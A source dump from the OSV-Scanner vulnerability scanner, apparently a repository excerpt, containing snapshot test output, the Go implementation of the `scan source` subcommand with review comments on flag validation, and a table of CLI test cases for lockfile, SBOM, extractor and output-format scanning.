/composer.lock Scanned /composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /osv-scanner-test.toml No issues found --- [TestCommand_WithDetector_OffLinux/ssh_version_errors - 2] --- [TestCommand_WithDetector_OffLinux/ssh_version_is_after_last_vuln_version - 1] Scanning dir /composer.lock Scanned /composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /osv-scanner-test.toml No issues found --- [TestCommand_WithDetector_OffLinux/ssh_version_is_after_last_vuln_version - 2] --- [TestCommand_WithDetector_OffLinux/ssh_version_is_before_first_vuln_version - 1] Scanning dir /composer.lock Scanned /composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /osv-scanner-test.toml No issues found --- [TestCommand_WithDetector_OffLinux/ssh_version_is_before_first_vuln_version - 2] --- [TestCommand_WithDetector_OnLinux/ssh_version_errors - 1] Scanning dir /composer.lock Command "ssh -V": exit status 1 Scanned /composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /osv-scanner-test.toml No issues found --- [TestCommand_WithDetector_OnLinux/ssh_version_errors - 2] --- [TestCommand_WithDetector_OnLinux/ssh_version_is_after_last_vuln_version - 1] Scanning dir /composer.lock Scanned /composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. 
Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /osv-scanner-test.toml No issues found --- [TestCommand_WithDetector_OnLinux/ssh_version_is_after_last_vuln_version - 2] --- [TestCommand_WithDetector_OnLinux/ssh_version_is_before_first_vuln_version - 1] Scanning dir /composer.lock Scanned /composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /osv-scanner-test.toml No issues found --- [TestCommand_WithDetector_OnLinux/ssh_version_is_before_first_vuln_version - 2] --- ================================================ FILE: cmd/osv-scanner/scan/source/command.go ================================================
// Package source implements the `source` subcommand of the `scan` command.
package source

import (
	"context"
	"errors"
	"fmt"
	"io"
	"net/http"
	"os"
	"path/filepath"

	"github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/helper"
	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/version"
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/google/osv-scanner/v2/pkg/osvscanner"
	"github.com/urfave/cli/v3"
)

// Command builds the `source` subcommand.
//
// It declares the flags that are specific to source scanning, appends the
// shared flags returned by helper.BuildCommonScanFlags, and wires the command's
// Action to action, passing through the given writers and HTTP client.
//
// Only two flags carry their own validation here: --sbom (logs a deprecation
// warning) and --data-source (rejects anything but "deps.dev" or "native").
// Every other flag value is handed to the scanner unchecked by this file.
func Command(stdout, stderr io.Writer, client *http.Client) *cli.Command {
	return &cli.Command{
		Name:        "source",
		Usage:       "scans a source project's dependencies for known vulnerabilities using the OSV database.",
		Description: "scans a source project's dependencies for known vulnerabilities using the OSV database.",
		Flags: append([]cli.Flag{
			&cli.StringSliceFlag{
				Name:      "lockfile",
				Aliases:   []string{"L"},
				Usage:     "scan package lockfile on this path",
				TakesFile: true,
			},
			&cli.StringSliceFlag{
				Name:    "sbom",
				Aliases: []string{"S"},
				Usage:   "[DEPRECATED] scan sbom file on this path, the sbom file name must follow the relevant spec",
				// The flag still works; the Action only emits the deprecation notice.
				Action: func(_ context.Context, _ *cli.Command, _ []string) error {
					cmdlogger.Warnf("Warning: --sbom has been deprecated in favor of -L")
					return nil
				},
				TakesFile: true,
			},
			&cli.BoolFlag{
				Name:    "recursive",
				Aliases: []string{"r"},
				Usage:   "check subdirectories",
				Value:   false,
			},
			&cli.BoolFlag{
				Name:  "no-ignore",
				Usage: "also scan files that would be ignored by .gitignore",
				Value: false,
			},
			&cli.BoolFlag{
				Name:  "include-git-root",
				Usage: "include scanning git root (non-submoduled) repositories",
				Value: false,
			},
			&cli.StringSliceFlag{
				Name:  "experimental-exclude",
				Usage: "exclude directory paths during scanning; use g:pattern for glob, r:pattern for regex, or just dirname for exact match (can be repeated)",
			},
			&cli.StringFlag{
				Name:  "data-source",
				Usage: "source to fetch package information from; value can be: deps.dev, native",
				Value: "deps.dev",
				// Allowlist check: fail at flag-parse time rather than letting an
				// unknown value silently fall through to the default behaviour.
				Action: func(_ context.Context, _ *cli.Command, s string) error {
					if s != "deps.dev" && s != "native" {
						return fmt.Errorf("unsupported data-source \"%s\" - must be one of: deps.dev, native", s)
					}

					return nil
				},
			},
			// NOTE(review): no validation is attached to this flag in this file; the
			// string is forwarded as-is into TransitiveScanningActions.MavenRegistry
			// in action. The registry URL decides where Maven metadata is fetched
			// from, so confirm the consumer checks the scheme/host before use.
			&cli.StringFlag{
				Name:  "maven-registry",
				Usage: "URL of the default registry to fetch Maven metadata",
			},
		}, helper.BuildCommonScanFlags([]string{"lockfile", "sbom", "directory"})...),
		ArgsUsage: "[directory1 directory2...]",
		Action: func(ctx context.Context, cmd *cli.Command) error {
			return action(ctx, cmd, stdout, stderr, client)
		},
	}
}

// action runs one `scan source` invocation: it translates the parsed flags
// into scanner actions, calls osvscanner.DoScan, prints the result and returns
// the scan error.
//
// The context argument is ignored (see the nolint note on the DoScan call).
//
// Error handling, in order:
//   - osvscanner.ErrNoPackagesFound is downgraded to a warning when
//     --allow-no-lockfiles is set;
//   - any other error except osvscanner.ErrVulnerabilitiesFound is returned
//     before anything is printed;
//   - osvscanner.ErrVulnerabilitiesFound is returned only after the result has
//     been printed, so callers still get the report;
//   - a failure in helper.PrintResult is wrapped and returned in place of the
//     scan error.
func action(_ context.Context, cmd *cli.Command, stdout, stderr io.Writer, client *http.Client) error {
	format := cmd.String("format")

	// --output-file takes precedence; --output is only read when it is empty.
	outputPath := cmd.String("output-file")
	if outputPath == "" {
		outputPath = cmd.String("output")
	}
	serve := cmd.Bool("serve")
	if serve {
		// --serve overrides whatever --format was given.
		format = "html"
		if outputPath == "" {
			// Create a temporary directory
			// os.MkdirTemp picks an unpredictable name and creates the directory
			// with mode 0700 (before umask), so the report is not written to a
			// guessable, shared path.
			tmpDir, err := os.MkdirTemp("", "osv-scanner-result")
			if err != nil {
				return fmt.Errorf("failed creating temporary directory: %w\n"+
					"Please use `--output-file result.html` to specify the output path", err)
			}

			// Remove the created temporary directory after
			// Runs when action returns, i.e. after helper.ServeHTML below has
			// returned; the RemoveAll error is not checked.
			defer os.RemoveAll(tmpDir)
			outputPath = filepath.Join(tmpDir, "index.html")
		}
	}

	scanLicensesAllowlist, err := helper.GetScanLicensesAllowlist(cmd)
	if err != nil {
		return err
	}

	experimentalScannerActions := helper.GetExperimentalScannerActions(cmd, client)
	// Identifies this subcommand and the scanner version in outgoing requests.
	experimentalScannerActions.RequestUserAgent = "osv-scanner_scan-source/" + version.OSVVersion
	experimentalScannerActions.ExcludePatterns = cmd.StringSlice("experimental-exclude")

	// Add `source` specific experimental configs
	// "no-resolve" is not declared in this file; presumably it comes from the
	// common scan flags. MavenRegistry is passed through without validation
	// here; verify it is checked where it is consumed.
	experimentalScannerActions.TransitiveScanning = osvscanner.TransitiveScanningActions{
		Disabled:         cmd.Bool("no-resolve"),
		NativeDataSource: cmd.String("data-source") == "native",
		MavenRegistry:    cmd.String("maven-registry"),
	}

	scannerAction := helper.GetCommonScannerActions(cmd, scanLicensesAllowlist)

	scannerAction.LockfilePaths = cmd.StringSlice("lockfile")
	//nolint:staticcheck // ignore our own deprecated field
	scannerAction.SBOMPaths = cmd.StringSlice("sbom")
	scannerAction.Recursive = cmd.Bool("recursive")
	scannerAction.NoIgnore = cmd.Bool("no-ignore")
	// Positional arguments are taken as the paths to scan.
	scannerAction.DirectoryPaths = cmd.Args().Slice()
	scannerAction.ExperimentalScannerActions = experimentalScannerActions

	var vulnResult models.VulnerabilityResults
	//nolint:contextcheck // passing the context in would be a breaking change
	vulnResult, err = osvscanner.DoScan(scannerAction)

	// Only the "nothing to scan" error is suppressed by --allow-no-lockfiles;
	// any other failure still propagates.
	if cmd.Bool("allow-no-lockfiles") && errors.Is(err, osvscanner.ErrNoPackagesFound) {
		cmdlogger.Warnf("No package sources found")
		err = nil
	}

	// ErrVulnerabilitiesFound is kept in err and deliberately not returned yet,
	// so the findings below are still printed.
	if err != nil && !errors.Is(err, osvscanner.ErrVulnerabilitiesFound) {
		return err
	}

	if errPrint := helper.PrintResult(stdout, stderr, outputPath, format, &vulnResult, scannerAction.ShowAllVulns); errPrint != nil {
		return fmt.Errorf("failed to write output: %w", errPrint)
	}

	// Auto-open outputted HTML file for users.
	if outputPath != "" {
		if serve {
			helper.ServeHTML(outputPath)
		} else if format == "html" {
			cmdlogger.Infof("HTML output available at: %s", outputPath)
		}
	}

	// This may be nil.
	// When non-nil at this point it is osvscanner.ErrVulnerabilitiesFound.
	return err
}

================================================ FILE: cmd/osv-scanner/scan/source/command_test.go ================================================ package source_test import ( "net/http" "os" "path/filepath" "runtime" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestCommand(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ // one specific supported lockfile { Name: "one_specific_supported_lockfile", Args: []string{"", "source", "./testdata/locks-many/composer.lock"}, Exit: 0, }, // one specific supported lockfile, explicitly not offline { Name: "one_specific_supported_lockfile_with_offline_explicitly_false", Args: []string{"", "source", "--offline=false", "./testdata/locks-many/composer.lock"}, Exit: 0, }, // one specific supported sbom with vulns { Name: "folder_of_supported_sbom_with_vulns", Args: []string{"", "source", "./testdata/sbom-insecure/"}, Exit: 1, }, // one specific supported sbom with only unimportant { Name: "folder_of_supported_sbom_with_only_unimportant", Args: []string{"", "source", "./testdata/sbom-insecure/only-unimportant.spdx.json"}, Exit: 0, }, // one specific supported sbom with only unimportant but with --all-vulns { Name: "folder_of_supported_sbom_with_only_unimportant", Args: []string{"", "source", "--all-vulns", "./testdata/sbom-insecure/only-unimportant.spdx.json"}, Exit: 1, }, // one specific supported sbom with vulns { Name: "one_specific_supported_sbom_with_vulns", Args: []string{"", "source", "--sbom", "./testdata/sbom-insecure/alpine.cdx.xml"}, Exit: 1, }, { Name: "one_specific_supported_sbom_with_vulns_using_-L_flag", Args: []string{"", "source", "-L", "./testdata/sbom-insecure/alpine.cdx.xml"}, Exit: 1, }, // one specific supported sbom with vulns and invalid PURLs { Name: "one_specific_supported_sbom_with_invalid_PURLs", Args: []string{"", "source", "--sbom",
"./testdata/sbom-insecure/bad-purls.cdx.xml"}, Exit: 0, }, { Name: "one_specific_supported_sbom_with_invalid_PURLs_using_-L_flag", Args: []string{"", "source", "-L", "./testdata/sbom-insecure/bad-purls.cdx.xml"}, Exit: 0, }, // one specific supported sbom with duplicate PURLs { Name: "one_specific_supported_sbom_with_duplicate_PURLs", Args: []string{"", "source", "--sbom", "./testdata/sbom-insecure/with-duplicates.cdx.xml"}, Exit: 1, }, { Name: "one_specific_supported_sbom_with_duplicate_PURLs_using_-L_flag", Args: []string{"", "source", "-L", "./testdata/sbom-insecure/with-duplicates.cdx.xml"}, Exit: 1, }, // one file that does not match the supported sbom file names { Name: "one_file_that_does_not_match_the_supported_sbom_file_names", Args: []string{"", "source", "--sbom", "./testdata/locks-many/composer.lock"}, Exit: 127, }, { Name: "one_file_that_does_not_match_the_supported_sbom_file_names_using_-L_flag", Args: []string{"", "source", "-L", "spdx:./testdata/locks-many/composer.lock"}, Exit: 127, }, // one specific unsupported lockfile { Name: "one_specific_unsupported_lockfile", Args: []string{"", "source", "./testdata/locks-many/not-a-lockfile.toml"}, Exit: 128, }, // all supported lockfiles in the directory should be checked { Name: "Scan_locks-many", Args: []string{"", "source", "./testdata/locks-many"}, Exit: 0, }, // all supported lockfiles in the directory should be checked { Name: "all_supported_lockfiles_in_the_directory_should_be_checked", Args: []string{"", "source", "./testdata/locks-many-with-invalid"}, Exit: 127, }, // no lockfiles present in a directory { Name: "no_lockfiles_without_recursion_or_allow_flag_give_an_error", Args: []string{"", "source", "./testdata/locks-none"}, Exit: 128, }, { Name: "no_lockfiles_without_recursion_but_with_allow_flag_are_fine", Args: []string{"", "source", "--allow-no-lockfiles", "./testdata/locks-none"}, Exit: 0, }, { Name: "no_lockfiles_with_allow_flag_but_another_error_happens_is_not_fine", Args: []string{"", 
"source", "--allow-no-lockfiles", "./testdata/locks-none-does-not-exist"}, Exit: 127, }, { Name: "no_lockfiles_with_recursion_but_without_allow_flag_are_fine", Args: []string{"", "source", "--recursive", "./testdata/locks-none"}, Exit: 0, }, { Name: "no_lockfiles_with_recursion_and_with_allow_flag_are_fine", Args: []string{"", "source", "--recursive", "--allow-no-lockfiles", "./testdata/locks-none"}, Exit: 0, }, // only the files in the given directories are checked by default (no recursion) { Name: "only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion)", Args: []string{"", "source", "./testdata/locks-one-with-nested"}, Exit: 0, }, // nested directories are checked when `--recursive` is passed { Name: "nested_directories_are_checked_when_`--recursive`_is_passed", Args: []string{"", "source", "--recursive", "./testdata/locks-one-with-nested"}, Exit: 0, }, // .gitignored files { Name: ".gitignored_files", Args: []string{"", "source", "--recursive", "./testdata/locks-gitignore"}, Exit: 0, }, // ignoring .gitignore { Name: "ignoring_.gitignore", Args: []string{"", "source", "--recursive", "--no-ignore", "./testdata/locks-gitignore"}, Exit: 0, }, // experimental exclude flag tests { Name: "exclude_with_exact_directory_name", Args: []string{"", "source", "--recursive", "--experimental-exclude=nested", "./testdata/locks-one-with-nested"}, Exit: 0, }, { Name: "exclude_with_glob_pattern", Args: []string{"", "source", "--recursive", "--experimental-exclude=g:**/nested/**", "./testdata/locks-one-with-nested"}, Exit: 0, }, { Name: "exclude_with_regex_pattern", Args: []string{"", "source", "--recursive", "--experimental-exclude=r:/nested$", "./testdata/locks-one-with-nested"}, Exit: 0, }, { Name: "exclude_with_invalid_regex_returns_error", Args: []string{"", "source", "--experimental-exclude=r:[invalid", "./testdata/locks-many"}, Exit: 127, }, { Name: "exclude_with_multiple_exact_directories", Args: []string{"", "source", "--recursive", 
"--experimental-exclude=nested", "--experimental-exclude=other", "./testdata/locks-one-with-nested"}, Exit: 0, }, { Name: "exclude_with_multiple_pattern_types", Args: []string{"", "source", "--recursive", "--experimental-exclude=nested", "--experimental-exclude=g:**/vendor/**", "--experimental-exclude=r:\\.cache$", "./testdata/locks-one-with-nested"}, Exit: 0, }, { Name: "json_output", Args: []string{"", "source", "--format", "json", "./testdata/locks-many/composer.lock"}, Exit: 0, }, // output format: sarif { Name: "Empty_sarif_output", Args: []string{"", "source", "--format", "sarif", "./testdata/locks-many/composer.lock"}, ReplaceRules: []testutility.JSONReplaceRule{ testutility.ReplacePartialFingerprintHash, }, Exit: 0, }, { Name: "Sarif_with_vulns", Args: []string{"", "source", "--format", "sarif", "./testdata/locks-many-with-insecure/package-lock.json"}, ReplaceRules: []testutility.JSONReplaceRule{ testutility.ReplacePartialFingerprintHash, }, Exit: 1, }, // output format: gh-annotations { Name: "Empty_gh-annotations_output", Args: []string{"", "source", "--format", "gh-annotations", "./testdata/locks-many/composer.lock"}, Exit: 0, }, { Name: "gh-annotations_with_vulns", Args: []string{"", "source", "--format", "gh-annotations", "./testdata/locks-many-with-insecure/package-lock.json"}, Exit: 1, }, // output format: markdown table { Name: "output_format:_markdown_table", Args: []string{"", "source", "--format", "markdown", "./testdata/locks-many-with-insecure/package-lock.json"}, Exit: 1, }, // output format: cyclonedx 1.4 { Name: "Empty_cyclonedx_1.4_output", Args: []string{"", "source", "--format", "cyclonedx-1-4", "./testdata/locks-many/composer.lock"}, Exit: 0, }, { Name: "cyclonedx_1.4_output", Args: []string{"", "source", "--config=./testdata/osv-scanner-empty-config.toml", "--format", "cyclonedx-1-4", "--all-packages", "./testdata/locks-insecure"}, Exit: 1, }, // output format: cyclonedx 1.5 { Name: "Empty_cyclonedx_1.5_output", Args: []string{"", 
"source", "--format", "cyclonedx-1-5", "./testdata/locks-many/composer.lock"}, Exit: 0, }, { Name: "cyclonedx_1.5_output", Args: []string{"", "source", "--config=./testdata/osv-scanner-empty-config.toml", "--format", "cyclonedx-1-5", "--all-packages", "./testdata/locks-insecure"}, Exit: 1, }, // output format: spdx 2.3 { Name: "Empty_spdx_2.3_output", Args: []string{"", "source", "--format", "spdx-2-3", "./testdata/locks-many/composer.lock"}, ReplaceRules: []testutility.JSONReplaceRule{ testutility.NormalizeCreateDateSPDX, }, Exit: 0, }, { Name: "spdx_2.3_output", // SPDX does not support outputting vulnerabilties Args: []string{"", "source", "--config=./testdata/osv-scanner-empty-config.toml", "--format", "spdx-2-3", "--all-packages", "./testdata/locks-insecure"}, ReplaceRules: []testutility.JSONReplaceRule{ testutility.NormalizeCreateDateSPDX, }, Exit: 1, }, // output format: unsupported { Name: "output_format:_unsupported", Args: []string{"", "source", "--format", "unknown", "./testdata/locks-many/composer.lock"}, Exit: 127, }, // one specific supported lockfile with ignore { Name: "one_specific_supported_lockfile_with_ignore", Args: []string{"", "source", "./testdata/locks-test-ignore/package-lock.json"}, Exit: 0, }, { Name: "invalid_--verbosity_value", Args: []string{"", "source", "--verbosity", "unknown", "./testdata/locks-many/composer.lock"}, Exit: 127, }, { Name: "verbosity_level_=_error", Args: []string{"", "source", "--verbosity", "error", "--format", "table", "./testdata/locks-many/composer.lock"}, Exit: 0, }, { Name: "verbosity_level_=_info", Args: []string{"", "source", "--verbosity", "info", "--format", "table", "./testdata/locks-many/composer.lock"}, Exit: 0, }, { Name: "PURL_SBOM_case_sensitivity_(api)", Args: []string{"", "source", "--format", "table", "./testdata/sbom-insecure/alpine.cdx.xml"}, Exit: 1, }, { Name: "PURL_SBOM_case_sensitivity_(local)", Args: []string{"", "source", "--offline", "--download-offline-databases", "--format", "table", 
"./testdata/sbom-insecure/alpine.cdx.xml"}, Exit: 1, }, // Go project with an overridden go version and licenses { Name: "Go_project_with_an_overridden_go_version_and_licences", Args: []string{"", "source", "--config=./testdata/go-project/go-version-config.toml", "--licenses", "./testdata/go-project"}, Exit: 0, }, // Go project with an overridden go version { Name: "Go_project_with_an_overridden_go_version", Args: []string{"", "source", "--config=./testdata/go-project/go-version-config.toml", "./testdata/go-project"}, Exit: 0, }, // Go project with an overridden go version, recursive { Name: "Go_project_with_an_overridden_go_version,_recursive", Args: []string{"", "source", "--config=./testdata/go-project/go-version-config.toml", "-r", "./testdata/go-project"}, Exit: 0, }, // broad config file that overrides a whole ecosystem { Name: "config_file_can_be_broad", Args: []string{"", "source", "--config=./testdata/osv-scanner-composite-config.toml", "--licenses=MIT", "-L", "osv-scanner:./testdata/locks-insecure/osv-scanner-flutter-deps.json", "./testdata/locks-many-with-insecure", "./testdata/locks-insecure", "./testdata/maven-transitive"}, Exit: 1, }, // ignored vulnerabilities and packages without a reason should be called out { Name: "ignores_without_reason_should_be_explicitly_called_out", Args: []string{"", "source", "--config=./testdata/osv-scanner-reasonless-ignores-config.toml", "./testdata/locks-many-with-insecure/package-lock.json", "./testdata/locks-many/composer.lock"}, Exit: 0, }, // invalid config file { Name: "config_file_is_invalid", Args: []string{"", "source", "./testdata/config-invalid"}, Exit: 130, }, // config file with unknown keys { Name: "config_files_cannot_have_unknown_keys", Args: []string{"", "source", "--config=./testdata/osv-scanner-unknown-config.toml", "./testdata/locks-many"}, Exit: 127, }, // config file with multiple ignores with the same id { Name: "config_files_should_not_have_multiple_ignores_with_the_same_id", Args: []string{"", 
"source", "--config=./testdata/osv-scanner-duplicate-config.toml", "./testdata/locks-many"}, Exit: 0, }, // a bunch of requirements.txt files with different names // --no-resolve is used as transitive resolution tests are in a separate section { Name: "requirements.txt_can_have_all_kinds_of_names", Args: []string{"", "source", "./testdata/locks-requirements", "--no-resolve"}, Exit: 1, }, { Name: "go_packages_in_osv-scanner.json_format", Args: []string{"", "source", "-L", "osv-scanner:./testdata/locks-insecure/osv-scanner.json"}, Exit: 1, }, { Name: "help", Args: []string{"", "source", "--help"}, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_Config_UnusedIgnores(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "unused_ignores_are_reported_with_specific_config_and_file", Args: []string{"", "source", "--config", "testdata/osv-scanner-partial-ignores-config.toml", "testdata/sbom-insecure/alpine.cdx.xml"}, Exit: 1, }, { Name: "unused_ignores_are_reported_with_specific_config_and_multiple_files", Args: []string{"", "source", "--config", "testdata/osv-scanner-partial-ignores-config.toml", "testdata/sbom-insecure/alpine.cdx.xml", "testdata/sbom-insecure/postgres-stretch.cdx.xml"}, Exit: 1, }, { Name: "unused_ignores_are_reported_with_specific_config_and_file", Args: []string{"", "source", "--config", "testdata/osv-scanner-partial-ignores-config.toml", "testdata/sbom-insecure"}, Exit: 1, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_JavareachArchive(t *testing.T) { t.Parallel() testutility.SkipIfShort(t) client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "jars_can_be_scanned_without_call_analysis", 
Args: []string{"", "source", "--all-vulns", "--experimental-plugins=artifact", "./testdata/artifact/javareach_test.jar"}, Exit: 1, }, { Name: "jars_can_be_scanned_with_call_analysis", Args: []string{"", "source", "--call-analysis=jar", "--all-vulns", "--experimental-plugins=artifact", "./testdata/artifact/javareach_test.jar"}, Exit: 1, }, { Name: "jars_can_be_scanned_with_call_analysis_and_disabled_enricher", Args: []string{"", "source", "--call-analysis=jar", "--experimental-disable-plugins=reachability/java", "--all-vulns", "--experimental-plugins=artifact", "./testdata/artifact/javareach_test.jar"}, Exit: 1, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_ExplicitExtractors_WithDefaults(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "empty_plugins_flag_does_nothing", Args: []string{"", "source", "--experimental-plugins="}, Exit: 127, }, { Name: "extractors_cancelled_out_specified_individually", Args: []string{ "", "source", "--experimental-plugins=sbom/spdx", "--experimental-plugins=sbom/cdx", "--experimental-disable-plugins=sbom", }, Exit: 128, }, { Name: "extractors_cancelled_out_specified_together", Args: []string{ "", "source", "--experimental-plugins=sbom/spdx,sbom/cdx", "--experimental-disable-plugins=sbom", }, Exit: 128, }, { Name: "extractors_cancelled_out_with_presets", Args: []string{ "", "source", "--experimental-plugins=sbom", "--experimental-disable-plugins=sbom", }, Exit: 128, }, { // this will scan all the lockfiles as we have not explicitly disabled the // default extractors for any of the other lockfiles Name: "scanning_directory_with_one_specific_extractor_enabled_and_the_defaults", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "./testdata/locks-many", }, Exit: 0, }, { Name: 
"scanning_directory_with_an_extractor_that_does_not_exist", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "--experimental-plugins=custom/extractor", "--experimental-disable-plugins=custom/anotherextractor", "./testdata/locks-many", }, Exit: 127, }, { // this will scan just the package-lock.json and composer.lock files as // we've not enabled extractors for any of the other lockfiles Name: "scanning_directory_with_a_couple_of_specific_extractors_enabled_individually", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "--experimental-plugins=php/composerlock", "./testdata/locks-many", }, Exit: 0, }, { // this will scan just the package-lock.json and composer.lock files as // we've not enabled extractors for any of the other lockfiles Name: "scanning_directory_with_a_couple_of_specific_extractors_enabled_specified_together", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson,php/composerlock", "./testdata/locks-many", }, Exit: 0, }, { // this should result in all files within the directory being scanned // except for the package-lock.json Name: "scanning_directory_with_one_specific_extractor_disabled", Args: []string{ "", "source", "--experimental-disable-plugins=javascript/packagelockjson", "./testdata/locks-many", }, Exit: 0, }, { // this will scan just the package lock, since we're requested that file specifically Name: "scanning_file_with_one_specific_extractor_enabled", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "./testdata/locks-many/package-lock.json", }, Exit: 0, }, { // this will result in no issues since we have left the default plugins enabled Name: "scanning_file_with_one_different_extractor_enabled", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "./testdata/locks-many/composer.lock", }, Exit: 0, }, { // this will result in an error about not being able to determine the extractor // 
since we've requested the file to be parsed with a specific extractor // that we've also disabled Name: "scanning_file_with_parse_as_but_specific_extractor_disabled", Args: []string{ "", "source", "--experimental-disable-plugins=javascript/packagelockjson", "-L", "package-lock.json:./testdata/locks-many/composer.lock", }, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_ExplicitExtractors_WithoutDefaults(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "empty_plugins_flag_does_nothing", Args: []string{"", "source", "--experimental-no-default-plugins", "--experimental-plugins="}, Exit: 127, }, { Name: "extractors_cancelled_out_specified_individually", Args: []string{ "", "source", "--experimental-plugins=sbom/spdx", "--experimental-plugins=sbom/cdx", "--experimental-disable-plugins=sbom", "--experimental-no-default-plugins", }, Exit: 127, }, { Name: "extractors_cancelled_out_specified_together", Args: []string{ "", "source", "--experimental-plugins=sbom/spdx,sbom/cdx", "--experimental-disable-plugins=sbom", "--experimental-no-default-plugins", }, Exit: 127, }, { Name: "extractors_cancelled_out_with_presets", Args: []string{ "", "source", "--experimental-plugins=sbom", "--experimental-disable-plugins=sbom", "--experimental-no-default-plugins", }, Exit: 127, }, { // this will scan just the package-lock.json file as we've explicitly // disabled the default extractors for any of the other lockfiles Name: "scanning_directory_with_one_specific_extractor_enabled_and_no_defaults", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "--experimental-no-default-plugins", "./testdata/locks-many", }, Exit: 0, }, { Name: "scanning_directory_with_an_extractor_that_does_not_exist", Args: []string{ "", "source", 
"--experimental-plugins=javascript/packagelockjson", "--experimental-plugins=custom/extractor", "--experimental-disable-plugins=custom/anotherextractor", "--experimental-no-default-plugins", "./testdata/locks-many", }, Exit: 127, }, { // this will scan just the package-lock.json and composer.lock files as // we've not enabled extractors for any of the other lockfiles Name: "scanning_directory_with_a_couple_of_specific_extractors_enabled_individually", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "--experimental-plugins=php/composerlock", "--experimental-no-default-plugins", "./testdata/locks-many", }, Exit: 0, }, { // this will scan just the package-lock.json and composer.lock files as // we've not enabled extractors for any of the other lockfiles Name: "scanning_directory_with_a_couple_of_specific_extractors_enabled_specified_together", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson,php/composerlock", "--experimental-no-default-plugins", "./testdata/locks-many", }, Exit: 0, }, { // this should result in all files within the directory being scanned // except for the package-lock.json Name: "scanning_directory_with_one_specific_extractor_disabled", Args: []string{ "", "source", "--experimental-disable-plugins=javascript/packagelockjson", "--experimental-no-default-plugins", "./testdata/locks-many", }, Exit: 0, }, { // this will scan just the package lock, since we're requested that file // specifically and have enabled just that extractor Name: "scanning_file_with_one_specific_extractor_enabled", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "--experimental-no-default-plugins", "./testdata/locks-many/package-lock.json", }, Exit: 0, }, { // this will result in an error about not being able to find any package sources // since we've requested a composer.lock be scanned without the extractor enabled Name: "scanning_file_with_one_different_extractor_enabled", 
Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "--experimental-no-default-plugins", "./testdata/locks-many/composer.lock", }, Exit: 128, }, { // this will result in an error about not being able to determine the extractor // since we've requested the file to be parsed with a specific extractor // that we've also disabled Name: "scanning_file_with_parse_as_but_specific_extractor_disabled", Args: []string{ "", "source", "--experimental-disable-plugins=javascript/packagelockjson", "--experimental-no-default-plugins", "-L", "package-lock.json:./testdata/locks-many/composer.lock", }, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_CallAnalysis(t *testing.T) { t.Parallel() // This does require Go toolchain, but the whole project requires go toolchain, // so not an external dependency client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "Run_with_govulncheck", Args: []string{"", "source", "--call-analysis=go", "--config=./testdata/osv-scanner-call-analysis-config.toml", "./testdata/call-analysis-go-project"}, Exit: 1, }, { Name: "Run_with_govulncheck_all_uncalled", Args: []string{"", "source", "--call-analysis=go", "--config=./testdata/osv-scanner-call-analysis-config.toml", "./testdata/call-analysis-go-project-all-uncalled"}, Exit: 0, }, { Name: "Run_with_govulncheck_all_uncalled_but_enabled_all-vulns_flag", Args: []string{"", "source", "--call-analysis=go", "--all-vulns", "--config=./testdata/osv-scanner-call-analysis-config.toml", "./testdata/call-analysis-go-project-all-uncalled"}, Exit: 1, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) 